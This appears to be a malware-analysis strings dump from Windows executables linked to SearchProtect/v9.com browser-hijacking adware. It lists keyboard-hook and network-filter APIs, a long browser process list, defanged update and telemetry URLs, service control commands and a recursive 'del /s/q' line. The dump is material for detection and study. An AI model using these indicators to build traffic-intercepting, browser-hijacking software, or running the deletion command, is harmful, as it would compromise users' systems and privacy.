kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
HelpKeywordp
HelpKeywordp
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordT
HelpKeywordT
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecutepWE
OnExecutepWE
127.0.0.1
127.0.0.1
255.0.0.0
255.0.0.0
ServiceExecute
ServiceExecute
\P_CheckUpdate.txt
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
&key=
\P_RuleList.txt
\P_RuleList.txt
[E] ProductKey :
[E] ProductKey :
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start WNet
cmd.exe /c net start WNet
cmd.exe /c net stop WNet
cmd.exe /c net stop WNet
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_tcpDisableFiltering
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_setTCPTimeout
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
5l6O6W6
5l6O6W6
?!?%?)?-?1?5?9?=?
?!?%?)?-?1?5?9?=?
5%6x6
5%6x6
1 1$1(1,1014181
1 1$1(1,1014181
0&0.080=0
0&0.080=0
2%3)3-31383
2%3)3-31383
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
1#1'1 1/13171;1
=!=,=7=?=_=
=!=,=7=?=_=
5 5$5(5,505
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3
3 3$3(3,3034383
3 3$3(3,3034383
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
I<.os8>
I<.os8>
KWindows
KWindows
UrlMon
UrlMon
OnExecute
OnExecute
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
ActSys.exe_2648:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
UhWEB
UhWEB
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
HelpKeyword
HelpKeyword
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword
HelpKeyword
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreviewx4D
KeyPreviewx4D
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecute
OnExecute
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
chrome.exe
chrome.exe
safari.exe
safari.exe
opera.exe
opera.exe
netscape.exe
netscape.exe
torch.exe
torch.exe
seamonkey.exe
seamonkey.exe
k-meleon.exe
k-meleon.exe
konqueror.exe
konqueror.exe
maxthon.exe
maxthon.exe
flock.exe
flock.exe
lunascape.exe
lunascape.exe
amaya.exe
amaya.exe
midori.exe
midori.exe
kidzui.exe
kidzui.exe
rockmelt.exe
rockmelt.exe
sbrowser.exe
sbrowser.exe
slimbrowser.exe
slimbrowser.exe
kidrocket.exe
kidrocket.exe
epic.exe
epic.exe
ironbrowser.exe
ironbrowser.exe
comodo.exe
comodo.exe
comododragon.exe
comododragon.exe
crazybrowser.exe
crazybrowser.exe
arora.exe
arora.exe
shenzbrowser.exe
shenzbrowser.exe
enigmabrowser.exe
enigmabrowser.exe
avant.exe
avant.exe
avantbrowser.exe
avantbrowser.exe
orca.exe
orca.exe
xbbrowser.exe
xbbrowser.exe
xbrowser.exe
xbrowser.exe
sleipnir.exe
sleipnir.exe
spacetime.exe
spacetime.exe
3dbrowse.exe
3dbrowse.exe
bitty.exe
bitty.exe
java.exe
java.exe
grail.exe
grail.exe
lynx.exe
lynx.exe
twb.exe
twb.exe
tt.exe
tt.exe
pinkbrowser.exe
pinkbrowser.exe
nuke.exe
nuke.exe
acoo.exe
acoo.exe
palemoon.exe
palemoon.exe
slimboat.exe
slimboat.exe
dooble.exe
dooble.exe
menubox.exe
menubox.exe
chromium.exe
chromium.exe
ultrabrowser.exe
ultrabrowser.exe
zac.exe
zac.exe
kylo.exe
kylo.exe
morequick.exe
morequick.exe
wyzo.exe
wyzo.exe
xombrero.exe
xombrero.exe
qupzilla.exe
qupzilla.exe
cometbird.exe
cometbird.exe
qtweb.exe
qtweb.exe
deepnet.exe
deepnet.exe
xtravo.exe
xtravo.exe
smartbro.exe
smartbro.exe
jumpto.exe
jumpto.exe
weblock4kids.exe
weblock4kids.exe
weblock.exe
weblock.exe
comodoice.exe
comodoice.exe
srwareiron.exe
srwareiron.exe
srware.exe
srware.exe
coolnovo.exe
coolnovo.exe
cool.exe
cool.exe
qup.exe
qup.exe
browseme.exe
browseme.exe
swiftfox.exe
swiftfox.exe
omniweb.exe
omniweb.exe
omni.exe
omni.exe
spark.exe
spark.exe
bobrowser.exe
bobrowser.exe
crossbrowser.exe
crossbrowser.exe
crossbrowse.exe
crossbrowse.exe
127.0.0.1
127.0.0.1
255.0.0.0
255.0.0.0
ServiceExecute
ServiceExecute
\P_CheckUpdate.txt
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
\nj_update.exe
hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=
hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=
&key=
&key=
\P_RuleList.txt
\P_RuleList.txt
[E] ProductKey :
[E] ProductKey :
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start ActSys
cmd.exe /c net start ActSys
cmd.exe /c net stop ActSys
cmd.exe /c net stop ActSys
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_tcpDisableFiltering
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_setTCPTimeout
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
pfc_setRootSSLCertSubject
5l6O6W6
5l6O6W6
3?3
3?3
:!:%:6:>:
:!:%:6:>:
;$
;$
: :$:(:,:
: :$:(:,:
5-55595P5u5}5
5-55595P5u5}5
=#=(=0=:=
=#=(=0=:=
3 3$3(3,3034383
3 3$3(3,3034383
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
KWindows
KWindows
UrlMon
UrlMon
OnExecute
OnExecute
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
ProtectService.exe_3496:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
GET %s%s%s HTTP/1.1
GET %s%s%s HTTP/1.1
Host: %s
Host: %s
%sUser-Agent: Mozilla/4.0
%sUser-Agent: Mozilla/4.0
POST %s HTTP/1.1
POST %s HTTP/1.1
%sContent-Type: %s
%sContent-Type: %s
User-Agent: Mozilla/4.0
User-Agent: Mozilla/4.0
Content-Length: %u
Content-Length: %u
%*s %d %*s
%*s %d %*s
%*[ ]%[^
%*[ ]%[^
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
file_url
file_url
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
GetProcessHeap
GetProcessHeap
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyW
RegOpenKeyW
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
MSVCP110.dll
MSVCP110.dll
InternetCrackUrlW
InternetCrackUrlW
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHLWAPI.dll
SHLWAPI.dll
MSVCR110.dll
MSVCR110.dll
_crt_debugger_hook
_crt_debugger_hook
__crtUnhandledException
__crtUnhandledException
__crtTerminateProcess
__crtTerminateProcess
_calloc_crt
_calloc_crt
__crtGetShowWindowMode
__crtGetShowWindowMode
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
__crtSetUnhandledExceptionFilter
__crtSetUnhandledExceptionFilter
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpOpen
WinHttpOpen
WinHttpSetTimeouts
WinHttpSetTimeouts
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpConnect
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpSetOption
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpSendRequest
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpGetProxyForUrl
WinHttpWriteData
WinHttpWriteData
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReadData
WINHTTP.dll
WINHTTP.dll
SensApi.dll
SensApi.dll
VERSION.dll
VERSION.dll
PSAPI.DLL
PSAPI.DLL
USERENV.dll
USERENV.dll
.?AVCHttpClient@@
.?AVCHttpClient@@
.?AVCTcpipSocket@@
.?AVCTcpipSocket@@
2-2v2
2-2v2
hXXp://
hXXp://
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=
http=
WinHttpClient
WinHttpClient
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
hXXp://xa.xingcloud.com
hXXp://xa.xingcloud.com
xxxx
xxxx
%u_%u
%u_%u
%s_%s
%s_%s
%s_X
%s_X
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
UpDateProcess.exe
UpDateProcess.exe
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Report HeartBeat
Report HeartBeat
cmdshell.exe
cmdshell.exe
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
explorer.exe
explorer.exe
Advapi32.dll
Advapi32.dll
"%s" %s
"%s" %s
psapi.dll
psapi.dll
Explorer.exe
Explorer.exe
json_value.cpp
json_value.cpp
ljson_reader.cpp
ljson_reader.cpp
ProtectSvc.exe
ProtectSvc.exe
4.0.1.2105
4.0.1.2105
HPNotify.exe_3664:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
wszUrl
wszUrl
strUrlTemp
strUrlTemp
hKEY
hKEY
strSelUrl
strSelUrl
strUrl
strUrl
strConfUrlTemp
strConfUrlTemp
strDsUrl
strDsUrl
strHpUrl
strHpUrl
strCmdLine
strCmdLine
tCPW
tCPW
%UUUU
%UUUU
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentDsUrl
e_GetBrowserCurrentDsUrl
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileW ret:0XX
URLDownloadToFileW ret:0XX
Error : %d
Error : %d
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.1.3
1.1.3
monochrome
monochrome
unsupported bit depth
unsupported bit depth
`'\%D,3
`'\%D,3
Run-Time Check Failure #%d - %s
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%p%s%ld%s%d%s
%s%s%s%s
%s%s%s%s
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
del /s/q %1\*.*
del /s/q %1\*.*
%suninstall.bat
%suninstall.bat
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
ShellExecuteA
ShellExecuteA
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHDeleteKeyW
SHDeleteKeyW
SHLWAPI.dll
SHLWAPI.dll
MSVCP110.dll
MSVCP110.dll
MSVCR110.dll
MSVCR110.dll
_calloc_crt
_calloc_crt
_CRT_RTC_INITW
_CRT_RTC_INITW
__crtGetShowWindowMode
__crtGetShowWindowMode
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
_crt_debugger_hook
_crt_debugger_hook
__crtUnhandledException
__crtUnhandledException
__crtTerminateProcess
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
__crtSetUnhandledExceptionFilter
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
IMM32.dll
IMM32.dll
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
WININET.dll
WININET.dll
COMCTL32.dll
COMCTL32.dll
GetProcessHeap
GetProcessHeap
#*1892 $
#*1892 $
%,3:;4-&
%,3:;4-&
.?AVCActiveXEnum@DuiLib@@
.?AVCActiveXEnum@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
3?3
3?3
1-2}2
1-2}2
77t7
77t7
9":,:6:@:
9":,:6:@:
12u2
12u2
: :$:(:,:0:
: :$:(:,:0:
4 4$4(4,404
4 4$4(4,404
>$?(?,?0?
>$?(?,?0?
2 2$2(2,20242
2 2$2(2,20242
0 1@1\1|1
0 1@1\1|1
hXXp://VVV.bing.com/
hXXp://VVV.bing.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.google.com/
hXXp://VVV.google.com/
%sconf
%sconf
web/?type=dspp&
web/?type=dspp&
web/?type=dspp
web/?type=dspp
hXXp://VVV.v9.com/
hXXp://VVV.v9.com/
Itemd
Itemd
BrowserAction.dll
BrowserAction.dll
%u_%u
%u_%u
%s_%s
%s_%s
%s_X
%s_X
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
UrlEdit
UrlEdit
conf.xml
conf.xml
hXXp://v9.com/license_agreement.html
hXXp://v9.com/license_agreement.html
hXXp://v9.com/privacy_policy.html
hXXp://v9.com/privacy_policy.html
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
%stmp%d.tmp
%stmp%d.tmp
urlmon.dll
urlmon.dll
main.xml
main.xml
explorer.exe
explorer.exe
